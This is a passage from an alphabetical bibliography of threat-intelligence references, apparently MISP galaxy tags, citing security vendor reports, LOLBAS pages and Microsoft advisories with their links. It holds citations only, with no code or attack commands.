https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4

ArsTechnica Intel

Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel source code and proprietary data dumped online. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="ArsTechnica Intel"

Table 14541. Table References

Links

https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/

Kaspersky Winnti April 2013

Kaspersky Lab’s Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.

The tag is: misp-galaxy:references="Kaspersky Winnti April 2013"

Table 14542. Table References

Links

https://securelist.com/winnti-more-than-just-a-game/37029/

polygot_icedID

Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="polygot_icedID"

Table 14543. Table References

Links

https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload

CrowdStrike Deep Panda Web Shells

RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.

The tag is: misp-galaxy:references="CrowdStrike Deep Panda Web Shells"

Table 14544. Table References

Links

http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/

MoustachedBouncer ESET August 2023

Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="MoustachedBouncer ESET August 2023"

Table 14545. Table References

Links

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

ESET MoustachedBouncer

Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 1, 2023.

The tag is: misp-galaxy:references="ESET MoustachedBouncer"

Table 14546. Table References

Links

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Progress Software MOVEit Transfer Critical Vulnerability

Progress Software. (2023, June 16). MOVEit Transfer Critical Vulnerability (May 2023) (CVE-2023-34362). Retrieved July 28, 2023.

The tag is: misp-galaxy:references="Progress Software MOVEit Transfer Critical Vulnerability"

Table 14547. Table References

Links

https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023

TechNet Moving Beyond EMET

Nunez, N. (2017, August 9). Moving Beyond EMET II – Windows Defender Exploit Guard. Retrieved March 12, 2018.

The tag is: misp-galaxy:references="TechNet Moving Beyond EMET"

Table 14548. Table References

Links

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

ScriptingOSX zsh

Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration Files. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="ScriptingOSX zsh"

Table 14549. Table References

Links

https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/

Volatility Detecting Hooks Sept 2012

Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Volatility Detecting Hooks Sept 2012"

Table 14550. Table References

Links

https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html

Mozilla Firefox Installer DLL Hijack

Kugler, R. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.

The tag is: misp-galaxy:references="Mozilla Firefox Installer DLL Hijack"

Table 14551. Table References

Links

https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/

mozilla_sec_adv_2012

Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.

The tag is: misp-galaxy:references="mozilla_sec_adv_2012"

Table 14552. Table References

Links

https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/

MpCmdRun.exe - LOLBAS Project

LOLBAS. (2020, March 20). MpCmdRun.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="MpCmdRun.exe - LOLBAS Project"

Table 14553. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/

TechNet MS14-019

Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking via .cmd or .bat file. Retrieved July 25, 2016.

The tag is: misp-galaxy:references="TechNet MS14-019"

Table 14554. Table References

Links

https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/

SRD GPP

Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.

The tag is: misp-galaxy:references="SRD GPP"

Table 14555. Table References

Links

http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx

MS14-025

Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved February 17, 2020.

The tag is: misp-galaxy:references="MS14-025"

Table 14556. Table References

Links

https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevati

Microsoft MS14-025

Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved January 28, 2015.

The tag is: misp-galaxy:references="Microsoft MS14-025"

Table 14557. Table References

Links

http://support.microsoft.com/kb/2962486

MSDN MSBuild

Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.

The tag is: misp-galaxy:references="MSDN MSBuild"

Table 14558. Table References

Links

https://msdn.microsoft.com/library/dd393574.aspx

LOLBAS Msbuild

LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Msbuild"

Table 14559. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msbuild/

Microsoft MSBuild Inline Tasks 2017

Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved March 5, 2021.

The tag is: misp-galaxy:references="Microsoft MSBuild Inline Tasks 2017"

Table 14560. Table References

Links

https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element

Msconfig.exe - LOLBAS Project

LOLBAS. (2018, May 25). Msconfig.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Msconfig.exe - LOLBAS Project"

Table 14561. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msconfig/

Msdeploy.exe - LOLBAS Project

LOLBAS. (2018, May 25). Msdeploy.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Msdeploy.exe - LOLBAS Project"

Table 14562. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/

MSDN File Associations

Microsoft. (n.d.). Retrieved July 26, 2016.

The tag is: misp-galaxy:references="MSDN File Associations"

Table 14563. Table References

Links

https://msdn.microsoft.com/en-us/library/cc144156.aspx

Microsoft DRSR Dec 2017

Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft DRSR Dec 2017"

Table 14564. Table References

Links

https://msdn.microsoft.com/library/cc228086.aspx

Msdt.exe - LOLBAS Project

LOLBAS. (2018, May 25). Msdt.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Msdt.exe - LOLBAS Project"

Table 14565. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msdt/

Msedge.exe - LOLBAS Project

LOLBAS. (2022, January 20). Msedge.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Msedge.exe - LOLBAS Project"

Table 14566. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msedge/

msedge_proxy.exe - LOLBAS Project

LOLBAS. (2023, August 18). msedge_proxy.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="msedge_proxy.exe - LOLBAS Project"

Table 14567. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/

msedgewebview2.exe - LOLBAS Project

LOLBAS. (2023, June 15). msedgewebview2.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="msedgewebview2.exe - LOLBAS Project"

Table 14568. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/

LOLBAS Mshta

LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Mshta"

Table 14569. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Mshta/

Mshtml.dll - LOLBAS Project

LOLBAS. (2018, May 25). Mshtml.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Mshtml.dll - LOLBAS Project"

Table 14570. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Mshtml/

Microsoft msiexec

Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.

The tag is: misp-galaxy:references="Microsoft msiexec"

Table 14571. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

LOLBAS Msiexec

LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="LOLBAS Msiexec"

Table 14572. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msiexec/

CIS Emotet Dec 2018

CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="CIS Emotet Dec 2018"

Table 14573. Table References

Links

https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/

Microsoft NRPC Dec 2017

Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.

The tag is: misp-galaxy:references="Microsoft NRPC Dec 2017"

Table 14574. Table References

Links

https://msdn.microsoft.com/library/cc237008.aspx

MsoHtmEd.exe - LOLBAS Project

LOLBAS. (2022, July 24). MsoHtmEd.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="MsoHtmEd.exe - LOLBAS Project"

Table 14575. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/

Mspub.exe - LOLBAS Project

LOLBAS. (2022, August 2). Mspub.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Mspub.exe - LOLBAS Project"

Table 14576. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/

Microsoft SAMR

Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft SAMR"

Table 14577. Table References

Links

https://msdn.microsoft.com/library/cc245496.aspx

GitHub IAD Secure Host Baseline UAC Filtering

NSA IAD. (2017, January 24). MS Security Guide. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="GitHub IAD Secure Host Baseline UAC Filtering"

Table 14578. Table References

Links

https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml

msxsl.exe - LOLBAS Project

LOLBAS. (2018, May 25). msxsl.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="msxsl.exe - LOLBAS Project"

Table 14579. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/

XSL Bypass Mar 2019

Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019.

The tag is: misp-galaxy:references="XSL Bypass Mar 2019"

Table 14580. Table References

Links

https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75

Mandiant M-Trends 2015

Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.

The tag is: misp-galaxy:references="Mandiant M-Trends 2015"

Table 14581. Table References

Links

https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

MTrends 2016

Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.

The tag is: misp-galaxy:references="MTrends 2016"

Table 14582. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf

Mandiant M-Trends 2020

Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.

The tag is: misp-galaxy:references="Mandiant M-Trends 2020"

Table 14583. Table References

Links

https://content.fireeye.com/m-trends/rpt-m-trends-2020

Accenture MUDCARP March 2019

Accenture iDefense Unit. (2019, March 5). Mudcarp’s Focus on Submarine Technologies. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="Accenture MUDCARP March 2019"

Table 14584. Table References

Links

https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies

Unit 42 MuddyWater Nov 2017

Lancaster, T. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.

The tag is: misp-galaxy:references="Unit 42 MuddyWater Nov 2017"

Table 14585. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

Securelist MuddyWater Oct 2018

Kaspersky Lab’s Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.

The tag is: misp-galaxy:references="Securelist MuddyWater Oct 2018"

Table 14586. Table References

Links

https://securelist.com/muddywater/88059/

ClearSky MuddyWater Nov 2018

ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.

The tag is: misp-galaxy:references="ClearSky MuddyWater Nov 2018"

Table 14587. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

TrendMicro POWERSTATS V3 June 2019

Lunghi, D. and Horejsi, J. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.

The tag is: misp-galaxy:references="TrendMicro POWERSTATS V3 June 2019"

Table 14588. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/

NIST MFA

NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January 30, 2020.

The tag is: misp-galaxy:references="NIST MFA"

Table 14589. Table References

Links

https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication

Talos Cobalt Group July 2018

Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.

The tag is: misp-galaxy:references="Talos Cobalt Group July 2018"

Table 14590. Table References

Links

https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html

U.S. CISA Zoho Exploits September 7 2023

Cybersecurity and Infrastructure Security Agency. (2023, September 7). Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="U.S. CISA Zoho Exploits September 7 2023"

Table 14591. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a

CIS Multiple SMB Vulnerabilities

CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="CIS Multiple SMB Vulnerabilities"

Table 14592. Table References

Links

https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/

GitHub Mauraena

Orrù, M., Trotta, G. (2019, September 11). Muraena. Retrieved October 14, 2019.

The tag is: misp-galaxy:references="GitHub Mauraena"

Table 14593. Table References

Links

https://github.com/muraenateam/muraena

Arbor Musical Chairs Feb 2018

Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="Arbor Musical Chairs Feb 2018"

Table 14594. Table References

Links

https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/

Mythc Documentation

Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Mythc Documentation"

Table 14595. Table References

Links

https://docs.mythic-c2.net/

Mythic Github

Thomas, C. (2018, July 4). Mythic. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Mythic Github"

Table 14596. Table References

Links

https://github.com/its-a-feature/Mythic

Crowdstrike Mythic Leopard Profile

Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Crowdstrike Mythic Leopard Profile"

Table 14597. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/

CheckPoint Naikon May 2020

CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="CheckPoint Naikon May 2020"

Table 14598. Table References

Links

https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/

Bitdefender Naikon April 2021

Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.

The tag is: misp-galaxy:references="Bitdefender Naikon April 2021"

Table 14599. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf

Microsoft Named Pipes

Microsoft. (2018, May 31). Named Pipes. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Named Pipes"

Table 14600. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes

fsecure NanHaiShu July 2016

F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.

The tag is: misp-galaxy:references="fsecure NanHaiShu July 2016"

Table 14601. Table References

Links

https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

DigiTrust NanoCore Jan 2017

The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="DigiTrust NanoCore Jan 2017"

Table 14602. Table References

Links

https://www.digitrustgroup.com/nanocore-not-your-average-rat/

PaloAlto NanoCore Feb 2016

Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="PaloAlto NanoCore Feb 2016"

Table 14603. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/

Unit42 BabyShark Feb 2019

Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.

The tag is: misp-galaxy:references="Unit42 BabyShark Feb 2019"

Table 14604. Table References

Links

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

National Vulnerability Database

National Vulnerability Database. (n.d.). National Vulnerability Database. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="National Vulnerability Database"

Table 14605. Table References

Links

https://nvd.nist.gov/

NationsBuying

Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="NationsBuying"

Table 14606. Table References

Links

https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

FireEye Maze May 2020

Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.

The tag is: misp-galaxy:references="FireEye Maze May 2020"

Table 14607. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

Talos NavRAT May 2018

Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.

The tag is: misp-galaxy:references="Talos NavRAT May 2018"

Table 14608. Table References

Links

https://blog.talosintelligence.com/2018/05/navrat.html

GitHub NBNSpoof

Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="GitHub NBNSpoof"

Table 14609. Table References

Links

https://github.com/nomex/nbnspoof

SecTools nbtscan June 2003

SecTools. (2003, June 11). NBTscan. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="SecTools nbtscan June 2003"

Table 14610. Table References

Links

https://sectools.org/tool/nbtscan/

Debian nbtscan Nov 2019

Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="Debian nbtscan Nov 2019"

Table 14611. Table References

Links

https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html

TechNet Nbtstat

Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Nbtstat"

Table 14612. Table References

Links

https://technet.microsoft.com/en-us/library/cc940106.aspx

NCSC Sandworm Feb 2020

NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="NCSC Sandworm Feb 2020"

Table 14613. Table References

Links

https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory

TechNet NetBIOS

Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="TechNet NetBIOS"

Table 14614. Table References

Links

https://technet.microsoft.com/library/cc958811.aspx

Microsoft Net

Microsoft. (2017, February 14). Net Commands On Windows Operating Systems. Retrieved March 19, 2020.

The tag is: misp-galaxy:references="Microsoft Net"

Table 14615. Table References

Links

https://support.microsoft.com/en-us/help/556003

Savill 1999

Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.

The tag is: misp-galaxy:references="Savill 1999"

Table 14616. Table References

Links

http://windowsitpro.com/windows/netexe-reference

Microsoft Net Utility

Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.

The tag is: misp-galaxy:references="Microsoft Net Utility"

Table 14617. Table References

Links

https://msdn.microsoft.com/en-us/library/aa939914

TechNet Netsh Firewall

Microsoft. (2009, June 3). Netsh Commands for Windows Firewall. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="TechNet Netsh Firewall"

Table 14618. Table References

Links

https://technet.microsoft.com/en-us/library/cc771046(v=ws.10).aspx

Netsh.exe - LOLBAS Project

LOLBAS. (2019, December 24). Netsh.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Netsh.exe - LOLBAS Project"

Table 14619. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Netsh/

Github Netsh Helper CS Beacon

Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.

The tag is: misp-galaxy:references="Github Netsh Helper CS Beacon"

Table 14620. Table References

Links

https://github.com/outflankbv/NetshHelperBeacon

TechNet Netstat

Microsoft. (n.d.). Netstat. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Netstat"

Table 14621. Table References

Links

https://technet.microsoft.com/en-us/library/bb490947.aspx

TechNet Net Time

Microsoft. (n.d.). Net time. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="TechNet Net Time"

Table 14622. Table References

Links

https://technet.microsoft.com/bb490716.aspx

Technet Net Use

Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="Technet Net Use"

Table 14623. Table References

Links

https://technet.microsoft.com/bb490717.aspx

TrendMicro Netwalker May 2020

Victor, K. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="TrendMicro Netwalker May 2020"

Table 14624. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/

Sophos Netwalker May 2020

Szappanos, G., Brandt, A. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="Sophos Netwalker May 2020"

Table 14625. Table References

Links

https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/

McAfee Netwire Mar 2015

McAfee. (2015, March 2). Netwire RAT Behind Recent Targeted Attacks. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="McAfee Netwire Mar 2015"

Table 14626. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/

Windows Anonymous Enumeration of SAM Accounts

Microsoft. (2017, April 19). Network access: Do not allow anonymous enumeration of SAM accounts and shares. Retrieved May 20, 2020.

The tag is: misp-galaxy:references="Windows Anonymous Enumeration of SAM Accounts"

Table 14627. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-do-not-allow-anonymous-enumeration-of-sam-accounts-and-shares

Microsoft Network access Credential Manager

Microsoft. (2016, August 31). Network access: Do not allow storage of passwords and credentials for network authentication. Retrieved November 23, 2020.

The tag is: misp-galaxy:references="Microsoft Network access Credential Manager"

Table 14628. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/jj852185(v=ws.11)?redirectedfrom=MSDN

Microsoft NFS Overview

Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft NFS Overview"

Table 14629. Table References

Links

https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview

Network Provider API

Microsoft. (2021, January 7). Network Provider API. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Network Provider API"

Table 14630. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api

Malwarebytes Agent Tesla April 2020

Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="Malwarebytes Agent Tesla April 2020"

Table 14631. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/

Malware Bytes New AgentTesla variant steals WiFi credentials

Hossein Jazi. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Malware Bytes New AgentTesla variant steals WiFi credentials"

Table 14632. Table References

Links

https://www.malwarebytes.com/blog/news/2020/04/new-agenttesla-variant-steals-wifi-credentials

TrendMicro New Andariel Tactics July 2018

Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="TrendMicro New Andariel Tactics July 2018"

Table 14633. Table References

Links

https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html

Unit 42 C0d0so0 Jan 2016

Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.

The tag is: misp-galaxy:references="Unit 42 C0d0so0 Jan 2016"

Table 14634. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/

Trend Micro Banking Malware Jan 2019

Salvio, J. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Trend Micro Banking Malware Jan 2019"

Table 14635. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/

IBM IcedID November 2017

Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.

The tag is: misp-galaxy:references="IBM IcedID November 2017"

Table 14636. Table References

Links

https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

Minerva Labs Black Basta May 2022

Zargarov, N. (2022, May 2). New Black Basta Ransomware Hijacks Windows Fax Service. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Minerva Labs Black Basta May 2022"

Table 14637. Table References

Links

https://minerva-labs.com/blog/new-black-basta-ransomware-hijacks-windows-fax-service/

Google TAG Lazarus Jan 2021

Weidemann, A. (2021, January 25). New campaign targeting security researchers. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="Google TAG Lazarus Jan 2021"

Table 14638. Table References

Links

https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/

Airbus Derusbi 2015

Perigaud, F. (2015, December 15). Newcomers in the Derusbi family. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Airbus Derusbi 2015"

Table 14639. Table References

Links

http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family

Malwarebytes Crossrider Apr 2018

Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.

The tag is: misp-galaxy:references="Malwarebytes Crossrider Apr 2018"

Table 14640. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/

CyberBit Early Bird Apr 2018

Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’ Code Injection Technique Discovered. Retrieved May 24, 2018.

The tag is: misp-galaxy:references="CyberBit Early Bird Apr 2018"

Table 14641. Table References

Links

https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/

Zscaler Molerats Campaign

Sahil Antil, Sudeep Singh. (2022, January 20). New espionage attack by Molerats APT targeting users in the Middle East. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Zscaler Molerats Campaign"

Table 14642. Table References

Links

https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east

CrowdStrike Wizard Spider March 2019

Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="CrowdStrike Wizard Spider March 2019"

Table 14643. Table References

Links

https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/

